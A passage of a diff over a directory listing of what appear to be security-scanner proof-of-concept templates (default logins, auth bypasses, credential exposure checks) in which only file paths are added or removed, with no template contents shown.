./poc/auth/faraday-login-7394.yaml -./poc/auth/faraday-login-7395.yaml ./poc/auth/faraday-login-7396.yaml -./poc/auth/faraday-login-7397.yaml ./poc/auth/faraday-login.yaml ./poc/auth/fastly-api-token.yaml +./poc/auth/fatpipe-auth-bypass-7431.yaml ./poc/auth/fatpipe-auth-bypass-7432.yaml -./poc/auth/fatpipe-auth-bypass.yaml ./poc/auth/fb-access-token.yaml ./poc/auth/fcm-api-key.yaml ./poc/auth/fcm-server-key-7450.yaml @@ -2288,9 +2261,9 @@ ./poc/auth/flir-ax8-default-credentials-7512.yaml ./poc/auth/flir-ax8-default-credentials.yaml ./poc/auth/flir-default-login-7513.yaml -./poc/auth/flir-default-login-7514.yaml ./poc/auth/flir-default-login-7515.yaml ./poc/auth/flir-default-login-7516.yaml +./poc/auth/flir-default-login.yaml ./poc/auth/flir-login.yaml ./poc/auth/fortiauthenticator-detect.yaml ./poc/auth/fortitester-login-panel.yaml @@ -2298,18 +2271,16 @@ ./poc/auth/frp-dashboard-unauth.yml ./poc/auth/frp-default-credentials-7555.yaml ./poc/auth/frp-default-credentials.yaml -./poc/auth/frp-default-login-7556.yaml ./poc/auth/frp-default-login-7557.yaml ./poc/auth/frp-default-login-7558.yaml ./poc/auth/frp-default-login-7559.yaml ./poc/auth/frp-unauthenticated.yaml ./poc/auth/ftp-anonymous-login.yaml ./poc/auth/ftp-credentials-exposure-7567.yaml -./poc/auth/ftp-credentials-exposure-7568.yaml +./poc/auth/ftp-credentials-exposure.yaml ./poc/auth/ftp-default-credentials.yaml ./poc/auth/ftp-default-creds.yaml ./poc/auth/ftp-weak-credentials-7569.yaml -./poc/auth/ftp-weak-credentials-7570.yaml ./poc/auth/ftp-weak-credentials.yaml ./poc/auth/fuelcms-default-login-7571.yaml ./poc/auth/fuelcms-default-login-7572.yaml @@ -2346,8 +2317,9 @@ ./poc/auth/git-credentials-7643.yaml ./poc/auth/git-credentials-7644.yaml ./poc/auth/git-credentials-disclosure-7639.yaml -./poc/auth/git-credentials-disclosure-7640.yaml +./poc/auth/git-credentials-disclosure-7641.yaml ./poc/auth/git-credentials-disclosure-7642.yaml +./poc/auth/git-credentials-disclosure.yaml ./poc/auth/git-credentials.yaml ./poc/auth/gitea-login-7645.yaml ./poc/auth/gitea-login-check.yaml @@ -2365,7 +2337,6 @@ ./poc/auth/gitlab-pipeline-triggertoken.yaml ./poc/auth/gitlab-public-signup-7681.yaml ./poc/auth/gitlab-public-signup-7682.yaml -./poc/auth/gitlab-public-signup-7683.yaml ./poc/auth/gitlab-public-signup-7684.yaml ./poc/auth/gitlab-public-signup.yaml ./poc/auth/gitlab-runner-regtoken.yaml @@ -2379,7 +2350,6 @@ ./poc/auth/gitlab-weak-login-7705.yaml ./poc/auth/gitlab-weak-login-7706.yaml ./poc/auth/gitlab-weak-login-7707.yaml -./poc/auth/gitlab-weak-login.yaml ./poc/auth/gitter-token.yaml ./poc/auth/gloo-unauth-7722.yaml ./poc/auth/gloo-unauth-7724.yaml @@ -2387,12 +2357,12 @@ ./poc/auth/gloo-unauth.yaml ./poc/auth/glpi-authentication-7728.yaml ./poc/auth/glpi-authentication-7729.yaml -./poc/auth/glpi-authentication-7730.yaml ./poc/auth/glpi-authentication.yaml ./poc/auth/glpi-default-credential.yaml ./poc/auth/glpi-default-login-7731.yaml ./poc/auth/glpi-default-login-7732.yaml ./poc/auth/glpi-default-login-7733.yaml +./poc/auth/glpi-default-login.yaml ./poc/auth/glpi-login-1.yaml ./poc/auth/glpi-login-2.yaml ./poc/auth/glpi-login-7735.yaml @@ -2400,7 +2370,6 @@ ./poc/auth/glpi-login-7737.yaml ./poc/auth/glpi-login.yaml ./poc/auth/gmail-api-client-secrets-7740.yaml -./poc/auth/gmail-api-client-secrets-7741.yaml ./poc/auth/gmail-api-client-secrets.yaml ./poc/auth/goanywhere-mft-login.yaml ./poc/auth/gocd-encryption-key-7750.yaml @@ -2432,10 +2401,12 @@ ./poc/auth/google-earth-dlogin-7778.yaml ./poc/auth/google-earth-dlogin-7779.yaml ./poc/auth/google-earth-dlogin-7780.yaml +./poc/auth/google-earth-dlogin-7781.yaml ./poc/auth/google-earth-dlogin-7782.yaml ./poc/auth/google-earth-dlogin.yaml ./poc/auth/google-earthenterprise-weak-password.yaml ./poc/auth/google-oauth-clientsecret.yaml +./poc/auth/google-secrets.yaml ./poc/auth/google-seo-author-snippets-c7ef7a54325272053bde6fd4c9883ada.yaml ./poc/auth/google-seo-author-snippets-ce873f3e8d7877eb7cdc80ae1da6d769.yaml ./poc/auth/google-seo-author-snippets-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -2446,7 +2417,7 @@ ./poc/auth/gophish-default-login-7792.yaml ./poc/auth/gophish-default-login-7793.yaml ./poc/auth/gophish-default-login-7794.yaml -./poc/auth/gophish-login-7795.yaml +./poc/auth/gophish-login-7796.yaml ./poc/auth/gophish-login.yaml ./poc/auth/grafana-api-key-exposure.yaml ./poc/auth/grafana-datasource-credentials-exposure.yml @@ -2463,6 +2434,7 @@ ./poc/auth/grafana-default-password.yaml ./poc/auth/grafana-default-password.yml ./poc/auth/grafana-login.yml +./poc/auth/grafana-public-signup-7814.yaml ./poc/auth/grafana-public-signup-7815.yaml ./poc/auth/grafana-public-signup-7816.yaml ./poc/auth/grafana-public-signup-7817.yaml @@ -2472,6 +2444,7 @@ ./poc/auth/gryphon-login.yaml ./poc/auth/gt-ac2900-login.yaml ./poc/auth/guacamole-default-login-7858.yaml +./poc/auth/guacamole-default-login-7859.yaml ./poc/auth/guacamole-default-login-7860.yaml ./poc/auth/guacamole-default-login-7861.yaml ./poc/auth/guest-author-25a9f786708949ed3cefc36430f46236.yaml @@ -2522,8 +2495,8 @@ ./poc/auth/homeworks-illumination-web-keypad.yaml ./poc/auth/hongdian-default-login-1.yaml ./poc/auth/hongdian-default-login-2.yaml +./poc/auth/hongdian-default-login-7997.yaml ./poc/auth/hongdian-default-login-7998.yaml -./poc/auth/hongdian-default-login-7999.yaml ./poc/auth/hongdian-default-password-1.yaml ./poc/auth/hongdian-default-password-2.yaml ./poc/auth/horde-login-panel.yaml @@ -2536,8 +2509,8 @@ ./poc/auth/houzez-login-register-bb43e7e2104f92ffb17608db5afe8e6a.yaml ./poc/auth/houzez-login-register.yaml ./poc/auth/hp-ilo-serial-key-disclosure-8022.yaml -./poc/auth/hp-ilo-serial-key-disclosure-8023.yaml ./poc/auth/hp-ilo-serial-key-disclosure-8024.yaml +./poc/auth/hp-ilo-serial-key-disclosure-8025.yaml ./poc/auth/hp-ilo-serial-key-disclosure.yaml ./poc/auth/hp-switch-default-login-8035.yaml ./poc/auth/hp-switch-default-login-8036.yaml @@ -2545,21 +2518,22 @@ ./poc/auth/hp-switch-default-login-8038.yaml ./poc/auth/hpe-system-management-login-8014.yaml ./poc/auth/hpe-system-management-login-8015.yaml +./poc/auth/hpe-system-management-login-8017.yaml ./poc/auth/hpe-system-management-login.yaml ./poc/auth/hrsale-unauthenticated-lfi-8039.yaml ./poc/auth/hrsale-unauthenticated-lfi-8040.yaml ./poc/auth/hrsale-unauthenticated-lfi-8041.yaml ./poc/auth/htpasswd-detection-8045.yaml +./poc/auth/htpasswd-detection-8046.yaml ./poc/auth/htpasswd-detection.yaml ./poc/auth/htpasswd.yaml ./poc/auth/http-auth-141b1b9924040b19c483025ca3d106e1.yaml ./poc/auth/http-auth.yaml -./poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml ./poc/auth/http-etcd-unauthenticated-api-data-leak-8057.yaml +./poc/auth/http-etcd-unauthenticated-api-data-leak.yaml ./poc/auth/http-username-password.yaml ./poc/auth/httponly-cookie-detect.yaml ./poc/auth/huawei-HG532e-default-login.yaml -./poc/auth/huawei-HG532e-default-router-login.yaml ./poc/auth/huawei-auth-http-server-fileread.yaml ./poc/auth/huawei-auth-server.yaml ./poc/auth/huawei-dg8045-auth-bypass.yaml @@ -2570,9 +2544,8 @@ ./poc/auth/huawei-router-auth-bypass-8073.yaml ./poc/auth/huawei-router-auth-bypass-8074.yaml ./poc/auth/huawei-router-auth-bypass-8075.yaml +./poc/auth/huawei-router-auth-bypass-8076.yaml ./poc/auth/hue-default-credential-8080.yaml -./poc/auth/hue-default-credential-8081.yaml -./poc/auth/hue-default-credential.yaml ./poc/auth/hue-login-panel.yaml ./poc/auth/iam-db-auth.yaml ./poc/auth/iam-key-rotation-90days.yaml @@ -2589,8 +2562,8 @@ ./poc/auth/ibm-mqseries-default-login-8108.yaml ./poc/auth/ibm-note-login-1.yaml ./poc/auth/ibm-note-login-2.yaml -./poc/auth/ibm-note-login-8110.yaml ./poc/auth/ibm-note-login-8111.yaml +./poc/auth/ibm-note-login-8112.yaml ./poc/auth/ibm-note-login.yaml ./poc/auth/ibm-signup-exposure-8119.yaml ./poc/auth/ibm-signup-exposure-8120.yaml @@ -2599,16 +2572,15 @@ ./poc/auth/ibm-storage-default-credential-8125.yaml ./poc/auth/ibm-storage-default-password.yaml ./poc/auth/icc-pro-login.yaml +./poc/auth/icinga-web-login-8134.yaml ./poc/auth/icinga-web-login-8135.yaml ./poc/auth/icinga-web-login-8136.yaml -./poc/auth/icinga-web-login-8137.yaml ./poc/auth/icinga-web-login.yaml ./poc/auth/ictprotege-login-panel.yaml ./poc/auth/idemia-biometrics-default-credentials.yaml ./poc/auth/idemia-biometrics-default-login-8138.yaml -./poc/auth/idemia-biometrics-default-login-8139.yaml ./poc/auth/idemia-biometrics-default-login-8140.yaml -./poc/auth/idemia-biometrics-default-login.yaml +./poc/auth/idemia-biometrics-default-login-8141.yaml ./poc/auth/ikuai-login-panel.yaml ./poc/auth/imgproxy-unauth.yaml ./poc/auth/imm-default-login.yaml @@ -2620,7 +2592,6 @@ ./poc/auth/intelbras-login.yaml ./poc/auth/intelliflash-login-panel.yaml ./poc/auth/iptime-default-login-8192.yaml -./poc/auth/iptime-default-login-8193.yaml ./poc/auth/iptime-default-login-8194.yaml ./poc/auth/issabel-login.yaml ./poc/auth/iubenda-cookie-law-solution-0f838161174c3a1452a42342cb556b62.yaml @@ -2638,13 +2609,12 @@ ./poc/auth/jamf-login.yaml ./poc/auth/jboss-default-password.yaml ./poc/auth/jboss-unauth.yml -./poc/auth/jellyseerr-login-panel.yaml ./poc/auth/jenkins-credentials-disclosure.yml ./poc/auth/jenkins-default-login.yaml ./poc/auth/jenkins-default-pwd.yaml -./poc/auth/jenkins-login-8277.yaml ./poc/auth/jenkins-login-8278.yaml ./poc/auth/jenkins-login-8279.yaml +./poc/auth/jenkins-login-8280.yaml ./poc/auth/jenkins-login-detection.yaml ./poc/auth/jenkins-login.yaml ./poc/auth/jenkins-token.yaml @@ -2652,6 +2622,7 @@ ./poc/auth/jenkins-unauthorized-access.yml ./poc/auth/jenkins-weak-password.yaml ./poc/auth/jfrog-login.yaml +./poc/auth/jfrog-unauth-build-exposed-8299.yaml ./poc/auth/jfrog-unauth-build-exposed-8300.yaml ./poc/auth/jfrog-unauth-build-exposed-8301.yaml ./poc/auth/jfrog-unauth-build-exposed-8302.yaml @@ -2660,6 +2631,7 @@ ./poc/auth/jinher-oa-c6-default-password.yaml ./poc/auth/jinher-oa-c6-default-password.yml ./poc/auth/jinher-oa-default-login-8311.yaml +./poc/auth/jinher-oa-default-login-8312.yaml ./poc/auth/jira-login-default.yaml ./poc/auth/jira-service-desk-signup-8318.yaml ./poc/auth/jira-service-desk-signup-8319.yaml @@ -2674,11 +2646,11 @@ ./poc/auth/jira-unauthenticated-dashboards-8327.yaml ./poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml ./poc/auth/jira-unauthenticated-installed-gadgets-8329.yaml -./poc/auth/jira-unauthenticated-popular-filters-8331.yaml +./poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml ./poc/auth/jira-unauthenticated-popular-filters.yaml -./poc/auth/jira-unauthenticated-projectcategories-8332.yaml ./poc/auth/jira-unauthenticated-projectcategories-8333.yaml ./poc/auth/jira-unauthenticated-projectcategories-8334.yaml +./poc/auth/jira-unauthenticated-projectcategories.yaml ./poc/auth/jira-unauthenticated-projects-8335.yaml ./poc/auth/jira-unauthenticated-projects-8336.yaml ./poc/auth/jira-unauthenticated-resolutions-8337.yaml @@ -2688,16 +2660,16 @@ ./poc/auth/jira-unauthenticated-user-picker-8341.yaml ./poc/auth/jira-unauthenticated.yaml ./poc/auth/jmx-default-login-8354.yaml -./poc/auth/jmx-default-login-8355.yaml ./poc/auth/jmx-default-login-8356.yaml +./poc/auth/jmx-default-login.yaml ./poc/auth/jmx-default-password.yaml ./poc/auth/jolokia-tomcat-creds-leak.yaml -./poc/auth/jolokia-unauthenticated-lfi-8364.yaml ./poc/auth/jolokia-unauthenticated-lfi-8365.yaml +./poc/auth/jolokia-unauthenticated-lfi-8366.yaml +./poc/auth/jolokia-unauthenticated-lfi.yaml ./poc/auth/jumpserver-unauth-rce.yaml ./poc/auth/jumpserver-unauth-rce.yml ./poc/auth/jumpserver-unauth.yaml -./poc/auth/jupyter-ipython-unauth-8402.yaml ./poc/auth/jupyter-ipython-unauth-8404.yaml ./poc/auth/jupyter-ipython-unauth-8405.yaml ./poc/auth/jupyter-ipython-unauth.yaml @@ -2706,33 +2678,33 @@ ./poc/auth/jupyter-notebook-unauthorized-access.yaml ./poc/auth/jupyter-notebook-unauthorized-access.yml ./poc/auth/jupyterhub-default-login-8399.yaml -./poc/auth/jupyterhub-default-login-8400.yaml ./poc/auth/jupyterhub-default-login-8401.yaml ./poc/auth/jwt-auth-095adf04b2058ec616033a7aa2b24d07.yaml ./poc/auth/jwt-auth.yaml ./poc/auth/jwt-detection.yaml ./poc/auth/jwt-token-8408.yaml ./poc/auth/jwt-token-8409.yaml -./poc/auth/jwt-token-8410.yaml +./poc/auth/jwt-token.yaml ./poc/auth/k8s-apiserver-unauthorized.yaml ./poc/auth/k8s-etcd-v3-unauthorized.yaml ./poc/auth/kafka-center-default-login-8415.yaml ./poc/auth/kafka-center-default-login-8416.yaml ./poc/auth/kafka-center-default-login-8417.yaml +./poc/auth/kafka-center-default-login.yaml ./poc/auth/kafka-center-default-password.yaml ./poc/auth/kafka-center-login-8419.yaml ./poc/auth/kafka-center-login.yaml ./poc/auth/kafka-manager-unauth.yml ./poc/auth/kakao-login-phish.yaml ./poc/auth/kanboard-login.yaml +./poc/auth/kasm-login-panel.yaml ./poc/auth/keenetic-web-login-8439.yaml ./poc/auth/keenetic-web-login-8440.yaml ./poc/auth/keenetic-web-login-8441.yaml -./poc/auth/keenetic-web-login-8443.yaml +./poc/auth/keenetic-web-login-8442.yaml ./poc/auth/keenetic-web-login.yaml ./poc/auth/kenesto-login-8445.yaml ./poc/auth/kenesto-login.yaml -./poc/auth/kentico-login-8446.yaml ./poc/auth/kentico-login-8447.yaml ./poc/auth/kentico-login.yaml ./poc/auth/key-cloak-admin-panel-2.yaml @@ -2742,14 +2714,14 @@ ./poc/auth/keybase-phish.yaml ./poc/auth/keycloak-admin-panel.yaml ./poc/auth/keycloak-json-8471.yaml -./poc/auth/keycloak-json-8472.yaml +./poc/auth/keycloak-json-8473.yaml ./poc/auth/keycloak-json-8474.yaml ./poc/auth/keycloak-open-redirect.yaml ./poc/auth/keycloak-openid-config-1.yaml ./poc/auth/keycloak-openid-config-2.yaml -./poc/auth/keycloak-openid-config-8475.yaml ./poc/auth/keycloak-openid-config-8476.yaml ./poc/auth/keycloak-openid-config-8477.yaml +./poc/auth/keycloak-openid-config.yaml ./poc/auth/keycloak-workflow.yaml ./poc/auth/keycloak-xss-8478.yaml ./poc/auth/keycloak-xss-8479.yaml @@ -2794,7 +2766,7 @@ ./poc/auth/kubeflow-dashboard-unauth-8517.yaml ./poc/auth/kubeflow-dashboard-unauth.yaml ./poc/auth/kubernetes-etcd-keys.yaml -./poc/auth/kubernetes-unauth.yaml +./poc/auth/kubernetes-unauth(1).yaml ./poc/auth/kubernetes-unauth.yml ./poc/auth/kyan-credential-exposure-8554.yaml ./poc/auth/kyan-credential-exposure.yaml @@ -2993,14 +2965,13 @@ ./poc/auth/lucee-login-8662.yaml ./poc/auth/lucee-login-8663.yaml ./poc/auth/lucee-login-8664.yaml -./poc/auth/lucee-login-8665.yaml ./poc/auth/lucee-login.yaml ./poc/auth/luci-login-detection-8671.yaml ./poc/auth/luci-login-detection.yaml ./poc/auth/lutron-iot-default-login-8674.yaml +./poc/auth/lutron-iot-default-login-8675.yaml ./poc/auth/lutron-iot-default-login-8676.yaml ./poc/auth/lutron-iot-default-login-8677.yaml -./poc/auth/lutron-iot-default-login-8678.yaml ./poc/auth/lutron-iot-default-login.yaml ./poc/auth/lws-hide-login-4a0fdd3939bffa759435178b943a6005.yaml ./poc/auth/lws-hide-login-7028a7a909c306df4421bd71aeeefb14.yaml @@ -3019,7 +2990,6 @@ ./poc/auth/mailchimp-api-key-8722.yaml ./poc/auth/mailchimp-api-key-8723.yaml ./poc/auth/mailchimp-api-key-8724.yaml -./poc/auth/mailchimp-api-key-8726.yaml ./poc/auth/mailchimp-api-key.yaml ./poc/auth/mailwatch-login.yaml ./poc/auth/maiteng-unauth.yaml @@ -3034,8 +3004,8 @@ ./poc/auth/matomo-login-portal.yaml ./poc/auth/meks-smart-author-widget-d7cf08d050d4d9c295d6307e65c1ae52.yaml ./poc/auth/meks-smart-author-widget.yaml -./poc/auth/meshcentral-login-8801.yaml ./poc/auth/meshcentral-login-8802.yaml +./poc/auth/meshcentral-login-8803.yaml ./poc/auth/meshcentral-login.yaml ./poc/auth/metersphere-login.yaml ./poc/auth/micro-focus-ucmdb-default-credentials-8843.yaml @@ -3145,7 +3115,6 @@ ./poc/auth/molongui-authorship-d4b210f46b637b290af516754eb158bf.yaml ./poc/auth/molongui-authorship-e8b0088ee9ffce961a1975e3644882d0.yaml ./poc/auth/molongui-authorship.yaml -./poc/auth/mongodb-unauth-8925.yaml ./poc/auth/mongodb-unauth-8926.yaml ./poc/auth/mongodb-unauth-8927.yaml ./poc/auth/mongodb-unauth-8928.yaml @@ -3191,10 +3160,10 @@ ./poc/auth/nacos-user-list-unauthorized.yaml ./poc/auth/nagios-default-credential-8989.yaml ./poc/auth/nagios-default-credential.yaml +./poc/auth/nagios-default-login-8990.yaml ./poc/auth/nagios-default-login-8991.yaml ./poc/auth/nagios-default-login-8992.yaml ./poc/auth/nagios-default-login-8993.yaml -./poc/auth/nagios-default-login-8994.yaml ./poc/auth/naver-login-phish.yaml ./poc/auth/netauth.yaml ./poc/auth/netdata-unauth.yaml @@ -3203,9 +3172,9 @@ ./poc/auth/netgear-prosafe-login.yaml ./poc/auth/netgear-router-auth-bypass-1.yaml ./poc/auth/netgear-router-auth-bypass-2.yaml -./poc/auth/netgear-router-auth-bypass-9025.yaml ./poc/auth/netgear-router-auth-bypass-9026.yaml ./poc/auth/netgear-router-auth-bypass-9027.yaml +./poc/auth/netgear-router-auth-bypass.yaml ./poc/auth/netscalar-aaa-login-9047.yaml ./poc/auth/netscalar-aaa-login-9048.yaml ./poc/auth/netscalar-aaa-login.yaml @@ -3213,8 +3182,8 @@ ./poc/auth/netscaler-aaa-login.yaml ./poc/auth/netsus-default-login-9058.yaml ./poc/auth/netsus-default-login-9059.yaml -./poc/auth/netsus-default-login-9060.yaml -./poc/auth/netsus-server-login-9062.yaml +./poc/auth/netsus-default-login.yaml +./poc/auth/netsus-server-login-9061.yaml ./poc/auth/netsus-server-login.yaml ./poc/auth/netsweeper-preauth-rce-workflow.yaml ./poc/auth/newrelic-admin-api-key-9071.yaml @@ -3239,7 +3208,6 @@ ./poc/auth/nps-default-login-9142.yaml ./poc/auth/nps-default-login-9143.yaml ./poc/auth/nps-default-login-9144.yaml -./poc/auth/nps-default-login-9145.yaml ./poc/auth/nps-default-password-9147.yaml ./poc/auth/nps-default-password.yaml ./poc/auth/nps-default-password.yml @@ -3254,11 +3222,13 @@ ./poc/auth/nutanix-web-console-login.yaml ./poc/auth/nuuno-network-login-9160.yaml ./poc/auth/nuuno-network-login-9161.yaml -./poc/auth/nuuno-network-login-9162.yaml ./poc/auth/nuuno-network-login-9163.yaml +./poc/auth/nuuno-network-login-9164.yaml +./poc/auth/nuuno-network-login.yaml ./poc/auth/o2-default-password.yaml ./poc/auth/oauth-access-key-9184.yaml ./poc/auth/oauth-access-key-9185.yaml +./poc/auth/oauth-access-key-9186.yaml ./poc/auth/oauth-client-cd3ce5265515419eaa2f80ce50d80c3b.yaml ./poc/auth/oauth-client-for-user-authentication-1e787d9eb928d177bffbf4da69766c02.yaml ./poc/auth/oauth-client-for-user-authentication-8b8330bacdc4e03bd13b4255b2f9c8e2.yaml @@ -3273,7 +3243,6 @@ ./poc/auth/oauth-twitter-feed-for-developers-2c4a03e880aaa9ac7d131e8aec6fd5ff.yaml ./poc/auth/oauth-twitter-feed-for-developers.yaml ./poc/auth/oauth2-detect-9180.yaml -./poc/auth/oauth2-detect-9181.yaml ./poc/auth/oauth2-detect-9182.yaml ./poc/auth/oauth2-detect-9183.yaml ./poc/auth/oauth2-provider-2ae833691d89595113a94c5ad9ff28e0.yaml @@ -3293,8 +3262,8 @@ ./poc/auth/oauth2-server.yaml ./poc/auth/obf_token_smuggling.yml ./poc/auth/ocs-inventory-login.yaml -./poc/auth/octobercms-default-login-9192.yaml ./poc/auth/octobercms-default-login-9193.yaml +./poc/auth/octobercms-default-login.yaml ./poc/auth/octoprint-login-1.yaml ./poc/auth/octoprint-login-2.yaml ./poc/auth/octoprint-login-9197.yaml @@ -3303,7 +3272,6 @@ ./poc/auth/ofbiz-default-credentials.yaml ./poc/auth/ofbiz-default-login-9208.yaml ./poc/auth/ofbiz-default-login-9209.yaml -./poc/auth/ofbiz-default-login-9210.yaml ./poc/auth/ofbiz-default-login-9211.yaml ./poc/auth/ofbiz-default-password.yaml ./poc/auth/officekeeper-admin-login.yaml @@ -3348,14 +3316,13 @@ ./poc/auth/onlyoffice-login-panel.yaml ./poc/auth/open-stack-dashboard-login-1.yaml ./poc/auth/open-stack-dashboard-login-2.yaml -./poc/auth/open-stack-dashboard-login-9322.yaml +./poc/auth/open-stack-dashboard-login-9321.yaml ./poc/auth/open-stack-dashboard-login-9323.yaml ./poc/auth/open-stack-dashboard-login-9324.yaml ./poc/auth/open-stack-dashboard-login.yaml ./poc/auth/openai-key.yaml ./poc/auth/openbmcs-secret-disclosure.yaml ./poc/auth/openemr-default-login-9270.yaml -./poc/auth/openemr-default-login.yaml ./poc/auth/openerp-default-password.yaml ./poc/auth/openfire-credentials-exposure.yaml ./poc/auth/opengear-login.yaml @@ -3372,6 +3339,7 @@ ./poc/auth/oracle-ebs-credentials-disclosure-9363.yaml ./poc/auth/oracle-ebs-credentials-disclosure.yaml ./poc/auth/oracle-enterprise-manager-login.yaml +./poc/auth/oracle-opera-login.yaml ./poc/auth/oracle-people-sign-in.yaml ./poc/auth/orbiteam-bscw-server-unauthenticated-lfi.yaml ./poc/auth/ov3-online-administration-unauthenticated-lfi.yaml @@ -3386,12 +3354,15 @@ ./poc/auth/panabit-gateway-default-password.yaml ./poc/auth/panabit-gateway-default-password.yml ./poc/auth/panabit-ixcache-default-login-9443.yaml +./poc/auth/panabit-ixcache-default-login.yaml ./poc/auth/panabit-ixcache-default-password.yaml ./poc/auth/panabit-ixcache-default-password.yml ./poc/auth/panos-default-credentials.yaml ./poc/auth/panos-default-login-9454.yaml +./poc/auth/panos-default-login-9455.yaml ./poc/auth/panos-default-login-9456.yaml ./poc/auth/panos-default-login-9457.yaml +./poc/auth/panos-default-login.yaml ./poc/auth/papercut-missing-auth.yaml ./poc/auth/password-policy-not-set.yaml ./poc/auth/password-policy.yaml @@ -3412,13 +3383,13 @@ ./poc/auth/passwords-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/passwords-manager-plugin.yaml ./poc/auth/passwords-manager.yaml -./poc/auth/paypal-braintree-token-11856.yaml +./poc/auth/paypal-braintree-token(1).yaml ./poc/auth/paypal-braintree-token.yaml ./poc/auth/pentaho-cve-2021-31602-authentication-bypass.yaml ./poc/auth/pentaho-cve-2021-31602-authentication-bypass.yml ./poc/auth/pentaho-default-login-9477.yaml -./poc/auth/pentaho-default-login-9478.yaml ./poc/auth/pentaho-default-login-9479.yaml +./poc/auth/pentaho-default-login-9480.yaml ./poc/auth/pentaho-default-login.yaml ./poc/auth/peoplenet-ikey.yaml ./poc/auth/peoplesoft-default-login.yaml @@ -3474,7 +3445,6 @@ ./poc/auth/pinpoint-unauth-1.yaml ./poc/auth/pinpoint-unauth-2.yaml ./poc/auth/pinpoint-unauth-9588.yaml -./poc/auth/pinpoint-unauth-9590.yaml ./poc/auth/pinpoint-unauth.yaml ./poc/auth/plainview-protect-passwords-64631f7e755eb94d7c99500d0510ac42.yaml ./poc/auth/plainview-protect-passwords-79caa4f8ea1fa3260f686401ac5493b5.yaml @@ -3489,10 +3459,9 @@ ./poc/auth/pmpro-register-helper.yaml ./poc/auth/poc-yaml-F5-BIG-IP-login-bypass-CVE-2022-1388.yaml ./poc/auth/poc-yaml-otter-default-password.yaml -./poc/auth/polycom-login-9625.yaml ./poc/auth/polycom-login-9626.yaml +./poc/auth/polycom-login-9627.yaml ./poc/auth/polycom-login.yaml -./poc/auth/possible-AEM-secrets.yaml ./poc/auth/postgres-default-logins.yaml ./poc/auth/postgresql-empty-password.yaml ./poc/auth/postgresql-weak-password.yaml @@ -3521,8 +3490,8 @@ ./poc/auth/pure-storage-login-9725.yaml ./poc/auth/pure-storage-login.yaml ./poc/auth/putty-private-key-disclosure-9729.yaml +./poc/auth/putty-private-key-disclosure-9730.yaml ./poc/auth/putty-private-key-disclosure-9731.yaml -./poc/auth/putty-private-key-disclosure-9732.yaml ./poc/auth/putty-private-key-disclosure.yaml ./poc/auth/putty-user-keyfile.yaml ./poc/auth/pypi-token.yaml @@ -3550,16 +3519,18 @@ ./poc/auth/rabbitmq-missing-auth.yaml ./poc/auth/racksnet-login.yaml ./poc/auth/rails-secret-token-disclosure-9808.yaml -./poc/auth/rails-secret-token-disclosure-9809.yaml +./poc/auth/rails-secret-token-disclosure-9810.yaml ./poc/auth/rails-secret-token-disclosure.yaml ./poc/auth/rails-secret-token.yaml ./poc/auth/rainloop-default-login-9811.yaml ./poc/auth/rainloop-default-login-9812.yaml ./poc/auth/rainloop-default-login-9813.yaml +./poc/auth/rainloop-default-login.yaml ./poc/auth/rancher-default-login-9814.yaml ./poc/auth/rancher-default-login-9815.yaml ./poc/auth/rancher-default-login-9816.yaml ./poc/auth/rancher-default-password.yaml +./poc/auth/ranger-default-login-9827.yaml ./poc/auth/ranger-default-login-9828.yaml ./poc/auth/raw-cookie-reuse.yaml ./poc/auth/real-cookie-banner-1dba91bdd70cfd02be29db46dcf540b8.yaml @@ -3629,13 +3600,13 @@ ./poc/auth/robomongo-credential.yaml ./poc/auth/rockmongo-default-credentials-9896.yaml ./poc/auth/rockmongo-default-credentials.yaml +./poc/auth/rockmongo-default-login-9897.yaml ./poc/auth/rockmongo-default-login-9898.yaml ./poc/auth/rockmongo-default-login-9899.yaml ./poc/auth/rockmongo-default-login-9900.yaml ./poc/auth/rockmongo-default-password.yaml ./poc/auth/rockmongo-default-password.yml -./poc/auth/routeros-login-9908.yaml -./poc/auth/routeros-login.yaml +./poc/auth/routeros-login-9909.yaml ./poc/auth/rseenet-default-login-9913.yaml ./poc/auth/rseenet-default-login-9914.yaml ./poc/auth/rseenet-default-login-9915.yaml @@ -3647,7 +3618,6 @@ ./poc/auth/ruijie-eg-and-nbr-guest-auth-guestisup-rce.yaml ./poc/auth/ruijie-eg-and-nbr-local-auth-php-fileread.yaml ./poc/auth/ruijie-eg-and-nbr-login-php-infoleak-to-rce.yaml -./poc/auth/ruijie-eg-password-leak-9922.yaml ./poc/auth/ruijie-eg-password-leak-9923.yaml ./poc/auth/ruijie-eg-password-leak-9924.yaml ./poc/auth/ruijie-eg-password-leak.yaml @@ -3665,8 +3635,8 @@ ./poc/auth/s3-bucket-key.yaml ./poc/auth/safenet-authentication-panel.yaml ./poc/auth/saferoads-vms-login-9970.yaml -./poc/auth/saferoads-vms-login-9971.yaml ./poc/auth/saferoads-vms-login-9972.yaml +./poc/auth/saferoads-vms-login-9973.yaml ./poc/auth/saferoads-vms-login-9974.yaml ./poc/auth/saferoads-vms-login.yaml ./poc/auth/sagem-2604-password-disclosure.yaml @@ -3680,6 +3650,7 @@ ./poc/auth/samsung-wlan-default-login-10015.yaml ./poc/auth/samsung-wlan-default-login-10016.yaml ./poc/auth/samsung-wlan-default-login-10017.yaml +./poc/auth/samsung-wlan-default-login-10018.yaml ./poc/auth/sangfor-ad-login-rce.yaml ./poc/auth/sangfor-behavior-management-or-identity-authentication-system.yaml ./poc/auth/sangfor-edr-arbitrary-admin-login.yaml @@ -3687,19 +3658,17 @@ ./poc/auth/sangfor-edr-auth-bypass-10022.yaml ./poc/auth/sangfor-edr-auth-bypass-10023.yaml ./poc/auth/sangfor-edr-auth-bypass-10024.yaml -./poc/auth/sangfor-edr-auth-bypass.yaml ./poc/auth/sangfor-report-rep-login-rce.yaml ./poc/auth/sangfor-vpn-supersession-rce.yaml ./poc/auth/sas-login-panel.yaml ./poc/auth/sauce-access-token.yaml ./poc/auth/sauter-login-10088.yaml -./poc/auth/sauter-login-10089.yaml ./poc/auth/sauter-login-10090.yaml +./poc/auth/sauter-login-10091.yaml ./poc/auth/sauter-login.yaml ./poc/auth/schneider-link150-login.yaml ./poc/auth/scriptcase-prod-login.yaml ./poc/auth/seagate-nas-login.yaml -./poc/auth/seats-login-10104.yaml ./poc/auth/seats-login-10105.yaml ./poc/auth/seats-login-10106.yaml ./poc/auth/seats-login-10107.yaml @@ -3748,9 +3717,9 @@ 